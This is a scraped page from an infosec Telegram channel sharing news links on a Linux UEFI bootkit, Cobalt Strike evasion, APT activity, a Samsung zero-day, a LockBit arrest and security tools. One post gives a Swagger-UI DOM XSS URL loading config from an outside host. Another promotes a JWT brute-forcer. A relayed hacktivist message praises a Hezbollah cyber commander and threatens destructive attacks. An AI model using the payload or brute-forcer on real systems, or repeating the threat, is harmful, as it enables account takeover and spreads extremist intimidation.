cKure Red
@ckuRED
2.35K subscribers
70 photos
32 videos
21 files
447 links
The director's cut on critical feeds from InfoSec world ๐ŸŒŽ

Main Channel: @cKure

โ˜•๏ธ or queries email us
๐Ÿ“จ i@ckure.org
Download Telegram
About
Blog
Apps
Platform
Join
cKure Red
2.35K subscribers
cKure Red
๐Ÿ˜ฌ Bootkitty: Analyzing the first UEFI bootkit for Linux.

ESET researchers analyze the first UEFI bootkit designed for Linux systems.


https://www.welivesecurity.com/en/eset-research/bootkitty-analyzing-first-uefi-bootkit-linux/
https://www.bleepingcomputer.com/news/security/researchers-discover-bootkitty-first-uefi-bootkit-malware-for-linux/
Please open Telegram to view this post
VIEW IN TELEGRAM
Welivesecurity
Bootkitty: Analyzing the first UEFI bootkit for Linux
ESET's discovery of the first UEFI bootkit designed for Linux sendss an important message: UEFI bootkits are no longer confined to Windows systems alone.
๐Ÿ”ฅ22โšก1๐Ÿ‘1๐Ÿฆ„1
1.91K views
cKure Red
โ˜„๏ธ Tying Cobalt Strike's UDRL, SleepMask, and BeaconGate together for your syscall and call stack spoofing needs.

https://rastamouse.me/udrl-sleepmask-and-beacongate/
Please open Telegram to view this post
VIEW IN TELEGRAM
Rasta Mouse
UDRL, SleepMask, and BeaconGate
I've been looking into Cobalt Strike's UDRL, SleepMask, and BeaconGate features over the last couple of days. It took me some time to understand the relationship between these capabilities, so the aim of this post is to provide a concise overview for thoseโ€ฆ
3๐Ÿ‘1
2.01K views
cKure Red
This media is not supported in the widget
VIEW IN TELEGRAM
๐Ÿ’ฉ8๐Ÿ‘4๐Ÿ‘Ž1๐Ÿคก1
1.27K views
cKure Red
๐Ÿ‡ต๐Ÿ‡ธ Prolific cyber security professional, Dr. Reza Avazeh, architect at Hizbollah and many hacktivist groups was executed by Israel ๐Ÿ‡ฎ๐Ÿ‡ฑ in a drone strike.

In a message by the hacker group, 'Handala': following statement of threat was made:

๐Ÿ˜ˆ Reza Avazeh Operation is coming!

Next Week
Destructive Week


Dr. Reza Avazeh, the former cyber commander of Hezbollah, the commander whose smile in Handala's actions will never be forgotten!

Martyr Reza Avazeh, one of the elites and senior managers of Hezbollah's cyber security, had a Ph.D in computer networks from the University of Tehran, and was martyred on October 20, 2024, along with his wife, engineer Masoume Karbasi, in a drone attack by the Zionist criminal regime in the city of Jounieh!

This cyber security elite was a prominent foundation in the field of Linux and had performed many valuable services in cyber resistance groups! We will never forget your smile! Your revenge is coming!

๐Ÿ’ป Handala-Hack.to
Please open Telegram to view this post
VIEW IN TELEGRAM
1.66K viewsedited  
cKure Red
โšฝ๏ธ The Russian APT group #Turla has gained access to the Pakistani APT group #Sidecopy + #TransparentTribe (Storm-0156)'s C2 server and used it to attack operators in Afghanistan and Pakistan.

https://blog.lumen.com/snowblind-the-invisible-hand-of-secret-blizzard/

https://www.microsoft.com/en-us/security/blog/2024/12/04/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage/

IoCs:

https://github.com/blacklotuslabs/IOCs/blob/main/Secret_Blizzard_IoCs.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
Lumen Blog
Snowblind: The invisible hand of Secret Blizzard
Find out how Black Lotus Labs uncovered a prolonged espionage campaign by Russian threat group Turla to penetrate Pakistani targets.
1.97K views
cKure Red
cKure Red
โšฝ๏ธ The Russian APT group #Turla has gained access to the Pakistani APT group #Sidecopy + #TransparentTribe (Storm-0156)'s C2 server and used it to attack operators in Afghanistan and Pakistan. https://blog.lumen.com/snowblind-the-invisible-hand-of-secretโ€ฆ
๐Ÿ‘1
2.22K views
cKure Red
โ— Yer another website:
theyseeyourphotos.com

[Google's AI based photo interpreter]
๐Ÿ‘1
2.38K views
cKure Red
๐Ÿ“ฑ (QR) Coding My Way Out of Here: C2 in Browser Isolation Environments.

https://cloud.google.com/blog/topics/threat-intelligence/c2-browser-isolation-environments/
Please open Telegram to view this post
VIEW IN TELEGRAM
Google Cloud Blog
(QR) Coding My Way Out of Here: C2 in Browser Isolation Environments | Google Cloud Blog
A technique to circumvent all types of browser isolation for the purpose of controlling a malicious implant via command and control.
๐Ÿ”ฅ2
2.65K views
cKure Red
โ˜„๏ธ Swagger-UI DOM XSS via DOMPurify library.

example.tld/swagger/ index.html?configUrl=https://xss.smarpo.com/test.json

https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ2
2.45K viewsedited  
cKure Red
๐Ÿฆ  LockBit Ransomware Developer Arrested in Israel.

Dual ๐Ÿ‡ท๐Ÿ‡บ Russian-Israeli ๐Ÿ‡ฎ๐Ÿ‡ฑ national Rostislav Panev was arrested last August and is facing extradition to the US for playing a critical role in LockBit's RaaS activities, dating back to the ransomware gang's origins.

https://www.darkreading.com/cyberattacks-data-breaches/lockbit-ransomware-developer-arrested-israel.
Please open Telegram to view this post
VIEW IN TELEGRAM
Darkreading
LockBit Ransomware Developer Arrested in Israel
Dual Russian-Israeli national Rostislav Panev was arrested last August and is facing extradition to the US for playing a critical role in LockBit's RaaS activities, dating back to the ransomware gang's origins.
๐Ÿ•Š3๐Ÿ”ฅ1
2.53K views
cKure Red
cKure Red pinned Deleted message
cKure Red
๐Ÿ“ฑTool to parse iOS sms.db for SMS messages. Supports message editing and 'unsend'.

https://github.com/h4x0r/parse_sms.db/tree/main
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - h4x0r/parse_sms.db
Contribute to h4x0r/parse_sms.db development by creating an account on GitHub.
2.36K views
cKure Red
๐Ÿ†• EXIF Stripper: A web based image-metadata remover utility.

https://ckure.esy.es/rx/tools/exif/

*Images are uploaded on a shared hosting server. This may be concerning even though there is a script that removes the pictures from server after regular intervals.
Other Web Utilities: ckure.esy.es/rx
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฃ1
1.98K views
cKure Red
๐Ÿ”  Researcher Turns Insecure License Plate Cameras Into Open Source Surveillance Tool.

https://www.404media.co/researcher-turns-insecure-license-plate-cameras-into-open-source-surveillance-tool

https://youtu.be/0dUnY1641WM
Please open Telegram to view this post
VIEW IN TELEGRAM
404 Media
Researcher Turns Insecure License Plate Cameras Into Open Source Surveillance Tool
Privacy advocate draws attention to the fact that hundreds of police surveillance cameras are streaming directly to the open internet.
๐Ÿ”ฅ2๐Ÿคฎ1
2K views
cKure Red
cKure Red
๐Ÿ†• EXIF Stripper: A web based image-metadata remover utility. https://ckure.esy.es/rx/tools/exif/ *Images are uploaded on a shared hosting server. This may be concerning even though there is a script that removes the pictures from server after regular intervals.โ€ฆ
๐Ÿ†• JWT Breaker: A web based client-side JSON Web Token brute-forcing utility.

https://ckure.esy.es/rx/tools/jwt/

To generate tokens, use: https://ckure.esy.es/rx/tools/jwt/gen.php
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ2
2.06K views
cKure Red
cKure Red pinned ยซ๐Ÿ†• JWT Breaker: A web based client-side JSON Web Token brute-forcing utility. https://ckure.esy.es/rx/tools/jwt/ To generate tokens, use: https://ckure.esy.es/rx/tools/jwt/gen.phpยป
cKure Red
๐Ÿค Google Project Zero researcher uncovers Zero-Click Zero-Day exploit targeting Samsung devices.

CVE-2024-49415: Security flaw impacting Monkey's Audio (APE) decoder on Samsung smartphones that could lead to code execution.

Out-of-bounds write in libsaped.so prior to SMR Dec-2024 Release 1 allows remote attackers to execute arbitrary code.

https://security.samsungmobile.com/securityUpdate.smsb


The function saped_rec in libsaped.so writes to a dmabuf allocated by the C2 media service, which always appears to have size 0x120000.

https://project-zero.issues.chromium.org/issues/368695689


https://thehackernews.com/2025/01/google-project-zero-researcher-uncovers.html
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ2๐Ÿ˜22
1.99K views
cKure Red
๐Ÿ”ผ baitroute: A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers.

https://github.com/utkusen/baitroute

https://utkusen.substack.com/p/how-to-create-vulnerable-looking
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - utkusen/baitroute: A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers
A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers - utkusen/baitroute
๐Ÿ”ฅ3
2.3K views
cKure Red
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ“ฑ Scam by Apple as it created a plain-text protocol and said it protects user privacy.
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ2๐Ÿ‘1๐Ÿค”1๐Ÿคฃ1
1.93K viewsedited  
cKure Red
๐Ÿ” ๐Ÿ” ๐Ÿ” 2๏ธโƒฃ๐Ÿ” ๐Ÿ” ๐Ÿ” 

https://youtu.be/3GUMoGRRA2U
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
The Patch Report for January 2025
#ThePatchReport #ZeroDayInitiative #0day
Welcome to the January 2025 edition of the Patch Report - our brief look into the latest security updates from Microsoft, Adobe, and beyond. It's a small release from Adobe, but it's the largest patch Tuesday in Microsoft'sโ€ฆ
1.87K views